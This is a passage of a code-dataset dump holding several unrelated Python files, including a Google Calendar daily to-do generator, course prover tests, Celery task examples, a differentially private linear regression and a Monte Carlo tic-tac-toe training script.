random\r\n\r\ntry:\r\n import argparse\r\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\r\nexcept ImportError:\r\n flags = None\r\n\r\nSCOPES = 'https://www.googleapis.com/auth/calendar.readonly'\r\nCLIENT_SECRET_FILE = 'client_secret.json'\r\nAPPLICATION_NAME = 'Google Calendar API Python Quickstart'\r\n\r\n\r\n#Google Calendar Python API\r\ndef get_credentials():\r\n \"\"\"Gets valid user credentials from storage.\r\n\r\n If nothing has been stored, or if the stored credentials are invalid,\r\n the OAuth2 flow is completed to obtain the new credentials.\r\n\r\n Returns:\r\n Credentials, the obtained credential.\r\n \"\"\"\r\n home_dir = os.path.expanduser('~')\r\n credential_dir = os.path.join(home_dir, '.credentials')\r\n if not os.path.exists(credential_dir):\r\n os.makedirs(credential_dir)\r\n credential_path = os.path.join(credential_dir,\r\n 'calendar-python-quickstart.json')\r\n\r\n store = Storage(credential_path)\r\n credentials = store.get()\r\n if not credentials or credentials.invalid:\r\n flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\r\n flow.user_agent = APPLICATION_NAME\r\n if flags:\r\n credentials = tools.run_flow(flow, store, flags)\r\n else: # Needed only for compatibility with Python 2.6\r\n credentials = tools.run(flow, store)\r\n print('Storing credentials to ' + credential_path)\r\n return credentials\r\n\r\ndef main():\r\n \"\"\"\r\n Creates a Google Calendar API service object and outputs a list of up to ten upcoming events \r\n of the user's calendar; also outputs various other sections defined below as a daily to do list txt file\r\n \"\"\"\r\n credentials = get_credentials()\r\n http = credentials.authorize(httplib2.Http())\r\n service = discovery.build('calendar', 'v3', http=http)\r\n\r\n now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time\r\n eventsResult = service.events().list(\r\n calendarId='primary', timeMin=now, maxResults=10, singleEvents=True,\r\n orderBy='startTime').execute()\r\n events = eventsResult.get('items', [])\r\n\r\n\r\n #build list of calendar events \r\n mainEvent = []\r\n if not events:\r\n mainEvent.append('No upcoming events found.')\r\n for event in events:\r\n start = event['start'].get('dateTime', event['start'].get('date'))\r\n mainEvent.append(start + \" \" + event['summary'])\r\n\r\n\r\n #This parses allrecipes.com for three random recipes per day to list \r\n http = httplib2.Http()\r\n status, response = http.request('http://allrecipes.com/recipes/454/everyday-cooking/more-meal-ideas/15-minute-meals/?internalSource=hub%20nav&referringId=1947&referringContentType=recipe%20hub&linkName=hub%20nav%20daughter&clickId=hub%20nav%202')\r\n\r\n recipeList = []\r\n for link in BeautifulSoup(response, \"html.parser\", parse_only=SoupStrainer('a')):\r\n if link.has_attr('href'):\r\n if '/recipe' in link['href']:\r\n recipeList.append(link['href'])\r\n\r\n todaysRecipes = []\r\n todaysRecipes.append('http://allrecipes.com' + random.choice(recipeList))\r\n todaysRecipes.append('http://allrecipes.com' + random.choice(recipeList))\r\n todaysRecipes.append('http://allrecipes.com' + random.choice(recipeList))\r\n\r\n #determines what day of workout it is based on prior day or resets circuit \r\n #note that this reads from whatever directory you choose to have the output file sent to; so this is my personal directory \r\n todaysWorkout = 'arms'\r\n try:\r\n if 'arms' in open(r\"C:\\Users\\Claire\\Desktop\\pydaily.txt\").read():\r\n todaysWorkout = 'legs'\r\n if 'legs' in open(r\"C:\\Users\\Claire\\Desktop\\pydaily.txt\").read():\r\n todaysWorkout = 'back'\r\n if 'back' in open(r\"C:\\Users\\Claire\\Desktop\\pydaily.txt\").read():\r\n todaysWorkout = 'chest'\r\n if 'chest' in open(r\"C:\\Users\\Claire\\Desktop\\pydaily.txt\").read():\r\n todaysWorkout = 'shoulders'\r\n if 'shoulders' in open(r\"C:\\Users\\Claire\\Desktop\\pydaily.txt\").read():\r\n todaysWorkout = 'break day'\r\n if 'break day' in open(r\"C:\\Users\\Claire\\Desktop\\pydaily.txt\").read():\r\n todaysWorkout = 'arms'\r\n except:\r\n print(\"No pre-existing file to read from.\")\r\n\r\n\r\n\r\n #These are additional things for the list; a greeting, a sample to do list, and add on section \r\n greeting= \"Hello! It's \" + datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\")\r\n dailyDo = ['thing 1', 'thing 2', 'thing 3', 'thing 4', 'thing 5 ', 'thing 6', 'thing 7 etc etc ']\r\n adds = \"Additional Notes About Today:\"\r\n\r\n\r\n #output all daily info to text file, rewrites file each time program is run \r\n with open(r\"C:\\Users\\Claire\\Desktop\\pydaily.txt\", \"w\") as f:\r\n f.write(greeting)\r\n f.write('\\n')\r\n f.write('\\n')\r\n f.write(\"Daily To-Do:\")\r\n f.write('\\n')\r\n for thing in dailyDo:\r\n f.write(thing)\r\n f.write('\\n')\r\n f.write('\\n')\r\n f.write(\"Major Upcoming Events\")\r\n f.write('\\n')\r\n for thing in mainEvent:\r\n f.write(thing)\r\n f.write('\\n')\r\n f.write('\\n')\r\n f.write(\"Random Recipe Ideas\")\r\n f.write('\\n')\r\n for thing in todaysRecipes:\r\n f.write(thing)\r\n f.write('\\n')\r\n f.write('\\n')\r\n f.write(\"Today's Workout:\")\r\n f.write(todaysWorkout)\r\n f.write('\\n')\r\n f.write(adds)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"pydaily.py","file_name":"pydaily.py","file_ext":"py","file_size_in_byte":5845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"61409725","text":"from models.units_model import Units\n\n\ndef show_menu():\n '''\n prints program menu\n '''\n menu = [\"\\nWhat would you like to do:\\n\",\n \"(1) List statistics\",\n \"(2) Display 3 cities with longest names\",\n \"(3) Display county's name with the largest number of communities\",\n \"(4) Display locations, that belong to more than one category\",\n \"(5) Advanced search\",\n \"(0) Exit program\\n\"]\n\n for line in menu:\n print(line)\n\n\ndef print_file_not_found():\n print(\"File 'malopolska.csv' not found\")\n\n\ndef get_choice():\n return input('Choose option: ')\n\n\ndef print_bad_choice():\n print('\\nBad choice, try again: \\n')\n\n\ndef display_longest_name_cities(malopolska):\n '''\n Args:\n - malopolska = obj of Units class\n '''\n print('\\nCities with a longest name: ')\n for city in malopolska.get_cities_with_longest_names():\n print(city)\n\n\ndef display_largest_counties(malopolska):\n print(\"\\nPowiat z największą liczbą gmin to powiat {}\".format(malopolska.get_county_with_most_communes_num().name))\n\n\ndef display_multicategory_locations(malopolska):\n '''\n Displays locations that belongs to more than 1 category\n '''\n location_occurency_dict = malopolska.get_locations_dict()\n\n for key, value in location_occurency_dict.items():\n if value > 1:\n print(\"{:25} l.kategorii: {}\".format(key, value))\n\n\ndef print_table(table, title_list):\n \"\"\"\n Prints table with data.\n\n Args:\n table: list of lists - table to display\n title_list: list containing table headers\n\n Returns:\n This function doesn't return anything it only prints to console.\n \"\"\"\n # Appends dictionary with widest record's length\n column_widths = {}\n total_width = 0\n\n for i in range(len(title_list)):\n widths = []\n widths.append(len(str(title_list[i])))\n for item in table:\n widths.append(len(str(item[i])))\n max_column_width = get_max_number(widths) + 4\n column_widths[\"column_\" + str(i)] = max_column_width\n total_width += max_column_width\n total_width += len(title_list) + 1\n\n # Printing\n print(\"/\" + \"-\" * (total_width - 2) + \"\\\\\")\n print(\"|\", end=\"\")\n for i in range(len(title_list)):\n print(\"{:^{}}\".format(title_list[i], column_widths[\"column_\" + str(i)]), \"|\", end=\"\", sep=\"\")\n print()\n for i in range(len(table)):\n print(\"|\", end=\"\")\n for j in range(len(table[i])):\n print(\"{:-^{}}\".format(\"\", column_widths[\"column_\" + str(j)]), \"|\", end=\"\", sep=\"\")\n print()\n print(\"|\", end=\"\")\n for j in range(len(table[i])):\n print(\"{:^{}}\".format(table[i][j], column_widths[\"column_\" + str(j)]), \"|\", end=\"\", sep=\"\")\n print()\n print(\"\\\\\" + \"-\" * (total_width - 2) + \"/\")\n print()\n\n\ndef get_max_number(numbers):\n '''\n Takes list of strings and returns longest strings\n\n Args:\n -numbers = list of strings\n\n Returns:\n - max_number = string\n '''\n max_number = numbers[0]\n for i in range(1, len(numbers)):\n if numbers[i] > max_number:\n max_number = numbers[i]\n return max_number\n\n\ndef get_phrase():\n return input('Searching for: ')\n\n\ndef print_not_found():\n print('\\nEntered phrase not found.')\n\n\ndef print_found(score_table):\n print(\"\\nFound {} location(s):\\n\".format(len(score_table)))\n","sub_path":"views/units_view.py","file_name":"units_view.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"451972283","text":"\"\"\" (c) This file is part of the course\n Mathematical Logic through Programming\n by Gonczarowski and Nisan.\n File name: code/predicates/prover_test.py \"\"\"\n\nfrom predicates.some_proofs import *\n\ndef test_prover_basic(debug=False):\n proof = syllogism_proof(debug)\n # Will be tested with the course staff's implementation of is_valid\n assert proof.is_valid()\n\n # Partial run - verifies all steps until stopped\n right_neutral_proof(True, True, True, True, debug)\n\ndef test_add_universal_instantiation(debug=False):\n proof = syllogism_proof_with_universal_instantiation(debug)\n # Will be tested with the course staff's implementation of is_valid\n assert proof.is_valid()\n\n # With a difference variable name\n prover = Prover({'Ay[(Man(y)->Mortal(y))]', 'Man(aristotle)'},\n 'Mortal(aristotle)', debug)\n step1 = prover.add_assumption('Ay[(Man(y)->Mortal(y))]')\n step2 = prover.add_universal_instantiation(\n '(Man(aristotle)->Mortal(aristotle))', step1, 'aristotle')\n step3 = prover.add_assumption('Man(aristotle)')\n step4 = prover.add_mp('Mortal(aristotle)', step3, step2)\n # Will be tested with the course staff's implementation of is_valid\n assert prover.proof.is_valid()\n\n proof = syllogism_all_all_proof(debug)\n # Will be tested with the course staff's implementation of is_valid\n assert proof.is_valid()\n\ndef test_add_tautological_inference(debug=False):\n proof = syllogism_all_all_proof_with_tautological_inference(debug)\n # Will be tested with the course staff's implementation of is_valid\n assert proof.is_valid()\n\n proof = syllogism_all_exists_proof()\n # Will be tested with the course staff's implementation of is_valid\n assert proof.is_valid()\n\ndef test_add_existential_derivation(debug=False):\n proof = syllogism_all_exists_proof_with_existential_derivation(debug)\n # Will be tested with the course staff's implementation of is_valid\n assert proof.is_valid()\n\ndef test_add_flipped_equality(debug=False):\n # Partial run - verifies all steps until stopped\n proof = right_neutral_proof(False, True, True, True, debug)\n # Verify that the critical conclusion were indeed derived\n assert _contains_line_with_formula(proof, 'x=plus(0,x)')\n assert _contains_line_with_formula(proof, '0=plus(minus(x),x)')\n assert _contains_line_with_formula(\n proof, 'plus(x,plus(y,z))=plus(plus(x,y),z)')\n\ndef test_add_free_instantiation(debug=False):\n # Partial run - verifies all steps until stopped\n proof = right_neutral_proof(False, False, True, True, debug) \n # Verify that the critical conclusion were indeed derived\n assert _contains_line_with_formula(\n proof, '0=plus(minus(minus(x)),minus(x))')\n assert _contains_line_with_formula(\n proof,\n 'plus(plus(minus(minus(x)),minus(x)),x)='\n 'plus(minus(minus(x)),plus(minus(x),x))')\n assert _contains_line_with_formula(proof, 'plus(0,0)=0')\n assert _contains_line_with_formula(proof, 'plus(x,0)=plus(0,plus(x,0))')\n assert _contains_line_with_formula(\n proof, 'plus(0,plus(x,0))=plus(plus(0,x),0)')\n\ndef test_add_substituted_equality(debug=False):\n # Partial run - verifies all steps until stopped\n proof = right_neutral_proof(False, False, False, True, debug)\n # Verify that the critical conclusion were indeed derived\n assert _contains_line_with_formula(\n proof,\n 'plus(plus(0,x),0)=plus(plus(plus(minus(minus(x)),minus(x)),x),0)')\n assert _contains_line_with_formula(\n proof,\n 'plus(plus(plus(minus(minus(x)),minus(x)),x),0)='\n 'plus(plus(minus(minus(x)),plus(minus(x),x)),0)')\n assert _contains_line_with_formula(\n proof,\n 'plus(plus(minus(minus(x)),plus(minus(x),x)),0)='\n 'plus(plus(minus(minus(x)),0),0)')\n assert _contains_line_with_formula(\n proof, 'plus(minus(minus(x)),plus(0,0))=plus(minus(minus(x)),0)')\n assert _contains_line_with_formula(\n proof, 'plus(minus(minus(x)),0)=plus(minus(minus(x)),plus(minus(x),x))')\n assert _contains_line_with_formula(\n proof, 'plus(plus(minus(minus(x)),minus(x)),x)=plus(0,x)')\n\ndef test_add_chained_equality(debug=False):\n proof = right_neutral_proof(False, False, False, False, debug)\n # Will be tested with the course staff's implementation of is_valid\n assert proof.is_valid()\n\ndef _contains_line_with_formula(proof, formula):\n for line in proof.lines:\n if str(line.formula) == formula:\n return True\n return False\n\ndef test_ex10(debug=False):\n test_prover_basic(debug)\n test_add_universal_instantiation(debug)\n test_add_tautological_inference(debug)\n test_add_existential_derivation(debug)\n test_add_flipped_equality(debug)\n test_add_free_instantiation(debug)\n test_add_substituted_equality(debug)\n test_add_chained_equality(debug)\n\ndef test_all(debug=False):\n test_ex10(debug)\n","sub_path":"code/predicates/prover_test.py","file_name":"prover_test.py","file_ext":"py","file_size_in_byte":4932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"392214198","text":"from util.responsetype import ResponseType\nfrom linebot.models import (\n TextSendMessage, ImageSendMessage\n)\n\n\nclass MessageBuilder:\n def __init__(self):\n self.msg = []\n\n def append_text(self, msg):\n self.msg.append(\n TextSendMessage(text=msg)\n )\n return self\n\n def append_img(self, original_url, preview_url=None):\n self.msg.append(\n ImageSendMessage(original_content_url=original_url, preview_image_url=preview_url if None else original_url)\n )\n return self\n","sub_path":"util/messagebuilder.py","file_name":"messagebuilder.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"522439802","text":"import sys\nimport re\nimport os\nos.chdir('D:')\nf=open(\"7\",\"r\")\nw=[]\nsubl=[]\nsubd={}\nfr=f.read()\nmatch=re.search('subject:(.+)\\n',fr.lower())\nif match:\n print ('found',match.group(1))\n subl=subl+[w for w in re.split('\\W',match.group(1)) if w]\n print (subl)\n for element in subl:\n if element in subd:\n subd[element]+=1\n else: subd[element]=1\n print (subd.items())\nmatch=re.search(\"filename:.+\\n([.+^\"----\"])\",fr.lower())\nprint (match.group())\nf.close()\n","sub_path":"rand.py","file_name":"rand.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"401112997","text":"from celery import Celery\nimport time\n\napp = Celery('tasks', broker='redis://localhost:6379')\n\n\n@app.task\ndef add(x, y):\n n = x + y\n time.sleep(5)\n # print(n)\n return n\n\n@app.task\ndef sub(x, y):\n n = x - y\n time.sleep(8)\n return n\n\n\n@app.task\ndef send_email(to):\n time.sleep(7)\n print(to)\n\n\n\nif __name__ == '__main__':\n\n add.delay(1, 2)\n sub.delay(3, 2)\n\n print('程序执行完成!')\n\n\n\n\n","sub_path":"code/FlaskCelery/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"188874499","text":"import sys\nsys.stdin = open('input.txt')\n\ns = input()\nt = input()\n\n\ndef GCD(a, b):\n while b:\n n = a % b\n a = b\n b = n\n return a\n\n\ndef LCM(a, b):\n return a * b // GCD(a, b)\n\n\nfor i in range(LCM(len(s), len(t))):\n if s[i % len(s)] != t[i % len(t)]:\n print(0)\n break\nelse:\n print(1)\n","sub_path":"boj/12871무한문자열.py","file_name":"12871무한문자열.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"482519931","text":"#/usr/bin/python3\n#-*- coding:utf-8 -*-\n'''\n模块定义为一个函数库,包含另个函数供其他模块使用\n函数yanghui(n)用于输出杨辉三角\n'''\ndef yanghui(n):\n #限制杨辉三角的阶数\n if not str(n).isdecimal() or n<2 or n>25:\n print('杨辉三角函数yanghui(n),参数必须是不下雨2且不大于25的正整数')\n return False\n #使用列表对象来生成杨辉三角\n x = []\n for i in range(1,n+1):\n x.append([1]*i)\n #计算杨辉三角矩阵其他值\n for i in range(2,n):\n for j in range(1,i):\n x[i][j]=x[i-1][j-1]+x[i-1][j]\n #输出杨辉三角\n for i in range(n):\n if n<=10:\n print(' '*(40-4*i),end='')\n for j in range(i+1):\n print('%-8d'% x[i][j],end='')\n print()\n'''代码结束'''\n\n'''独立运行测试代码开始'''\nif __name__=='__main__':\n print('模块独立运行测试输出')\n print('一,10阶杨辉三角如下:')\n yanghui(10)","sub_path":"3.函数与模块/5.编程实践:函数库/yanghui.py","file_name":"yanghui.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"376265713","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 14 13:13:09 2018\n\n@author: msed\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\" Trying to implement Algorithm 1 out of the paper Zhang et al. for linear regression\"\"\"\ndef lin_reg(data_x,data_y,epsilon):\n #input pairs (x,y) and privacy budget epsilon; each line of data_x is supposed to be one input vector\n #assume both data_x and data_y are numpy arrays\n (n,d)=data_x.shape\n print(n,d)\n #assuming data_x and data_y don't have absolute value greater than 1\n Delta=2*(1+2*d+d^2)\n # j = 0 : constant terms (in w) in objective function\n lambd_0=(data_y**2).sum()+np.random.laplace(scale=Delta/epsilon)\n # j = 1 : linear terms (in w) in objective function\n # lambd_1 is a d dimensional array holding all the coefficients for the d monomials in w\n lambd_1=-2*data_y.dot(data_x)+np.random.laplace(scale=Delta/epsilon,size=d)\n # j = 2: quadratic terms (in w) in objective function\n # lambd_2 is a d x d dimensional array holding all the coefficients for the d x d quadratic terms of form w_j*w_l\n lambd_2=data_x.transpose().dot(data_x)+np.random.laplace(scale=Delta/epsilon)\n \n lambd_2_new=lambd_2+np.transpose(lambd_2)\n #solve quadratic optimization problem: minimize lambd_0+lambd_1^T*w+1/2w^T*lambd_2_new*w\n #==> solve lambd_2_new * w = -lambd_1\n w=np.linalg.solve(lambd_2_new,-lambd_1)\n return(w)\n\n\"\"\"small example to show that in case of very big epsilon (noise effectively zero) we get correct linear regression\"\"\"\n\ndata_x=np.array([[1,0.2],[1,0.4],[1,0.6]]) # add a x_0 = 1 coordinate for computing w_0\ndata_y=np.array([0.1,0.5,0.6])\n\nx1=np.linspace(0,1,20)\nw=lin_reg(data_x,data_y,1000)\n\n\ndef lin(w, x):\n return w[1]*x+w[0]\n\nprint(lin(w,x1))\n\nplt.scatter(data_x[:,1],data_y,color='red')\nplt.plot(x1,lin(w,x1),color='blue',linestyle='--')\nplt.show()","sub_path":"Martin/Linear_Regression(slightly faster).py","file_name":"Linear_Regression(slightly faster).py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"286341693","text":"import numpy\nimport numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.initializers import RandomUniform\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Conv2D, Flatten\nimport monte_carlo as mc \n\n\n'''\n Functions specific to the game which is a generalised version of tic tac toe.\n the size of the grid and the number needed in a row to win can be changed at\n the top of the script with s and w. \n \n Player Class, contains value function, policy and function, and win statistics\n for the functions.\n Generation Class, contains best player,challenging player and the data generated \n by their games. The play games method plays the games and returns the\n player with the most wins.\n Game class, Actally plays out the game between two players calling all of the game \n and tree search function. contains data just for that game. \n \n \n\n'''\n\n\n\n\n#size of board\ns = 5\n#number to win\nw = 3\n\n\n\ndef soft_max(x):\n x = np.array(x)\n x = np.exp(x)\n x = x/np.sum(x)\n return x\n\n\ndef make_policy(l=7,board_size=s):\n '''\n creates players. l is the number of layers.\n\n '''\n model = Sequential()\n model.add(Conv2D(32, kernel_size=2, activation='relu', padding='same' ,\n input_shape=(2,board_size,board_size),bias_initializer=RandomUniform(seed=1)))\n for _ in range(l):\n model.add(Conv2D(64, kernel_size=2,padding='same' ,activation='relu',bias_initializer=RandomUniform()))\n\n model.add(Flatten())\n model.add(Dense(50,activation='relu',bias_initializer=RandomUniform()))\n model.add(Dense(1, activation='sigmoid',bias_initializer=RandomUniform()))\n model.compile(optimizer = 'adam', loss='mean_squared_error')\n return model\n\ndef make_value(l=5,board_size=s):\n '''\n creates players. l is the number of layers.\n '''\n model = Sequential()\n model.add(Conv2D(32, kernel_size=2, activation='relu', padding='same' ,\n input_shape=(1,board_size,board_size),bias_initializer=RandomUniform()))\n for _ in range(l):\n model.add(Conv2D(64, kernel_size=2,padding='same' ,activation='relu'))\n\n model.add(Flatten())\n model.add(Dense(50,activation='relu'))\n model.add(Dense(1, activation='tanh'))\n model.compile(optimizer = 'adam', loss='mean_squared_error')\n return model\n\n\n\ndef is_win(board,size=s,win_length=w):\n b = board\n size = size\n win_length = win_length\n for row in range(size):\n for col in range(size):\n try:\n dir1 = np.sum(b[row][col:col+win_length])\n if dir1 == win_length:\n return 1\n if dir1 == -win_length:\n return -1\n except:\n pass\n\n try:\n dir1 = np.sum(b[row][col-win_length+1:col+1])\n if dir1 == win_length:\n return 1\n if dir1 == -win_length:\n return -1\n except:\n pass\n\n try:\n dir1 = np.sum(b[:,col][row:row+win_length])\n if dir1 == win_length:\n return 1\n if dir1 == -win_length:\n return -1\n except:\n pass\n\n try:\n dir1 = np.sum(b[:,col][row-win_length+1:row])\n if dir1 == win_length:\n return 1\n if dir1 == -win_length:\n return -1\n except:\n pass\n diags = [(1,1),(-1,-1),(1,-1),(1,-1)]\n for d in diags:\n try:\n dir1 = 0\n for j in range(win_length):\n if row + j*d[0]<0 or col +j*d[1]<0:\n break\n dir1 += b[row+j*d[0],col+j*d[1]]\n if dir1 == win_length:\n return 1\n if dir1 == -win_length:\n return -1\n except:\n pass\n return 0\n\ndef is_terminal(board):\n if is_draw(board) or is_win(board) != 0:\n return True \n return False \n\ndef is_draw(board):\n if np.sum(board == 0) != 0:\n return 0\n return 1\n\ndef make_board(size=s):\n return np.zeros((s,s))\n\ndef make_move(b,move,turn):\n board = np.copy(b)\n if turn == 0:\n board[move[0],move[1]] = 1\n else:\n board[move[0],move[1]] = -1\n return board \n\n\ndef legal_moves(board,player,size=s):\n moves = []\n for i in range(size):\n for j in range(size):\n if board[i,j] == 0:\n moves.append((i,j))\n if player == 'max':\n turn = 0\n else:\n turn = 1\n states = [make_move(board,m,turn) for m in moves]\n return states \n\n\ndef create_value_vec(state):\n return state.reshape((1,s,s))\n\ndef create_action_vec(s1,s2):\n vec = np.zeros((2,s,s))\n vec[0] = s1 \n vec[1] = s2\n return vec\n\ndef value(model,state):\n vec = create_value_vec(state)\n return model.predict(np.array([vec]))\n\ndef policy(model,s1,s2):\n vec = create_action_vec(s1,s2)\n return model.predict(np.array([vec]))\n\n\ndef sigmoid(x):\n return 1/(1+np.exp(-np.array(x)))\n \n\nclass Game:\n\n def __init__(self,player1,player2):\n self.player1 = player1 \n self.player2 = player2 \n self.board = make_board()\n self.player1_tree = mc.Node(value,policy,player1,self.board,'max',legal_moves,is_terminal,[])\n self.player2_tree = None \n self.x_val = np.zeros((s*s,1,s,s))\n self.y_val = np.ones((s*s,1))\n self.count = 1\n self.game_states = [self.board]\n def play_game(self):\n first_move = True\n while True:\n mc.tree_search(self.player1_tree,num_searches=50)\n values = [c.value/c.N for c in self.player1_tree.children]\n print([c.N for c in self.player1_tree.children])\n move = np.argmax(values)\n self.player1_tree = self.player1_tree.children[move]\n self.board = self.player1_tree.state\n self.game_states.append(self.board)\n self.x_val[self.count] = np.copy(create_value_vec(self.board))\n self.count += 1\n print(self.board,'\\n')\n if is_win(self.board):\n for i in range(self.count):\n self.y_val[i] = self.y_val[i]*(.9**(self.count-1-i))\n return 1 \n if is_draw(self.board):\n self.y_val = 0*self.y_val \n return 0\n \n if first_move:\n self.player2_tree = mc.Node(value,policy,self.player2,self.board,'min',legal_moves,is_terminal,[])\n first_move = False \n else:\n if self.player2_tree.children == []:\n print('no children')\n self.player2_tree.add_children()\n \n n = [i for i in range(len(self.player2_tree.children)) if np.array_equal(self.player2_tree.children[i].state,self.board)]\n \n self.player2_tree = self.player2_tree.children[n[0]]\n \n \n mc.tree_search(self.player2_tree,num_searches=50)\n values = [c.value/c.N for c in self.player2_tree.children]\n print([c.N for c in self.player2_tree.children])\n move = np.argmin(values)\n self.player2_tree = self.player2_tree.children[move]\n self.board = self.player2_tree.state\n self.game_states.append(self.board)\n print(self.board,'\\n')\n self.x_val[self.count] = np.copy(create_value_vec(self.board))\n self.count += 1\n if is_win(self.board)==-1:\n self.y_val = -1*self.y_val\n for i in range(self.count):\n self.y_val[i] = self.y_val[i]*(.9**(self.count-1-i))\n return -1\n \n if is_draw(self.board):\n self.y_val = 0*self.y_val \n return 0\n if self.player1_tree.children == []:\n print('no children')\n self.player1_tree.add_children()\n \n n = [i for i in range(len(self.player1_tree.children)) if np.array_equal(self.player1_tree.children[i].state,self.board)]\n \n self.player1_tree = self.player1_tree.children[n[0]]\n \n def clip_data(self):\n self.x_val = self.x_val[:self.count]\n self.y_val = self.y_val[:self.count]\n\n def get_action_data(self):\n x_action = []\n y_action = []\n \n for node in self.player1_tree.node_lst:\n \n if node.parent == None:\n pass \n else:\n curr_node = node\n val = node.value/node.N \n while curr_node.parent != None:\n val_anc = curr_node.parent.value/curr_node.parent.N\n\n if val > val_anc:\n curr_node.action_data += 1\n curr_node = curr_node.parent\n \n for node in self.player1_tree.node_lst:\n \n if node.parent == None:\n pass\n elif node.children == [] and node.terminal == False:\n pass \n elif node.children == [] and node.terminal:\n win = is_win(node.state)\n if win == 1:\n vec = create_action_vec(node.parent.state,node.state)\n y_action.append(1)\n x_action.append(vec)\n if win == -1:\n vec = create_action_vec(node.parent.state,node.state)\n y_action.append(-1)\n x_action.append(vec) \n else:\n vec = create_action_vec(node.parent.state,node.state)\n x_action.append(vec)\n y_action.append(node.action_data/node.N)\n \n \n \n for node in self.player2_tree.node_lst:\n \n if node.parent == None:\n pass \n else:\n curr_node = node\n val = node.value/node.N \n while curr_node.parent != None:\n val_anc = curr_node.parent.value/curr_node.parent.N\n if val > val_anc:\n curr_node.action_data += 1\n curr_node = curr_node.parent\n\n \n for node in self.player2_tree.node_lst:\n if node.parent == None:\n pass\n elif node.children == [] and node.terminal == False:\n pass \n elif node.children == [] and node.terminal:\n win = is_win(node.state)\n if win == 1:\n vec = create_action_vec(node.parent.state,node.state)\n y_action.append(1)\n x_action.append(vec)\n if win == -1:\n vec = create_action_vec(node.parent.state,node.state)\n y_action.append(-1)\n x_action.append(vec) \n else:\n vec = create_action_vec(node.parent.state,node.state)\n x_action.append(vec)\n y_action.append(node.action_data/node.N)\n return np.array(x_action),np.array(y_action)\n\nclass Player:\n\n def __init__(self):\n self.wins = 0 \n self.losses = 0\n self.models = [make_value(),make_policy()] \n \n def train(self,vx,vy,ax,ay):\n self.models[0].fit(vx,vy,epochs=3,validation_split=.1)\n self.models[1].fit(ax,ay,epochs=10,validation_split = .1)\n\n\nclass Generation:\n\n def __init__(self,players,num_games=10):\n self.players = players\n self.action_data = np.zeros((350000,2,s,s))\n self.value_data = np.zeros((30000,1,s,s))\n self.action_tar = np.zeros((350000,1))\n self.value_tar = np.zeros((30000,1))\n self.action_count = 0\n self.value_count = 0\n self.num_games = num_games \n self.sample_games = []\n \n def play_games(self):\n for i in range(self.num_games):\n #np.random.shuffle(self.players)\n player1 = self.players[0].models\n player2 = self.players[1].models\n g = Game(player1,player2)\n win = g.play_game()\n if win:\n self.players[0].wins += 1\n if win == -1:\n self.players[1].wins += 1\n a_x,a_y = g.get_action_data()\n g.clip_data()\n v_x,v_y = g.x_val,g.y_val\n n = len(v_x)\n m = len(a_x)\n v_y = v_y.reshape(n,1)\n a_y = a_y.reshape(m,1)\n self.action_data[self.action_count:self.action_count+m] = a_x \n self.action_tar[self.action_count:self.action_count+m] = a_y\n self.value_data[self.value_count:self.value_count+n] = v_x \n self.value_tar[self.value_count:self.value_count+n] = v_y \n self.action_count += m \n self.value_count += n\n self.sample_games.append(g.game_states) \n print('Game {} Done {} {}'.format(i,n,m))\n for i in range(self.num_games):\n #np.random.shuffle(self.players)\n player1 = self.players[1].models\n player2 = self.players[0].models\n g = Game(player1,player2)\n win = g.play_game()\n if win:\n self.players[1].wins += 1\n if win == -1:\n self.players[0].wins += 1\n a_x,a_y = g.get_action_data()\n g.clip_data()\n v_x,v_y = g.x_val,g.y_val\n n = len(v_x)\n m = len(a_x)\n v_y = v_y.reshape(n,1)\n a_y = a_y.reshape(m,1)\n self.action_data[self.action_count:self.action_count+m] = a_x \n self.action_tar[self.action_count:self.action_count+m] = a_y\n self.value_data[self.value_count:self.value_count+n] = v_x \n self.value_tar[self.value_count:self.value_count+n] = v_y \n self.action_count += m \n self.value_count += n\n self.sample_games.append(g.game_states) \n print('Game {} Done {} {}'.format(i,n,m))\n if self.players[0].wins>= self.players[1].wins:\n return self.players[0] \n else:\n print('best player change')\n return self.players[1]\n\n\n def clip_data(self):\n '''\n Space in pre-allocated so this removes \n unused rows.\n '''\n self.value_data = self.value_data[:self.value_count]\n self.action_data = self.action_data[:self.action_count]\n self.value_tar = self.value_tar[:self.value_count]\n self.action_tar = self.action_tar[:self.action_count]\n \n \n\ndef augment_v(vx,vy):\n '''\n The game is rotationaly invarient so we exploit this to\n increase the training data.\n \n '''\n n = vx.shape[0]\n A = np.zeros((4*vx.shape[0],1,s,s))\n Ay = np.zeros((4*vx.shape[0],1))\n for i in range(n):\n vec = vx[i][0]\n tar = vy[i][0]\n vec1 = np.rot90(vec, k=1)\n vec2 = np.rot90(vec, k=2)\n vec3 = np.rot90(vec, k=3)\n A[4*i] = vec.reshape(1,s,s) \n A[4*i+1] = vec1.reshape(1,s,s)\n A[4*i+2] = 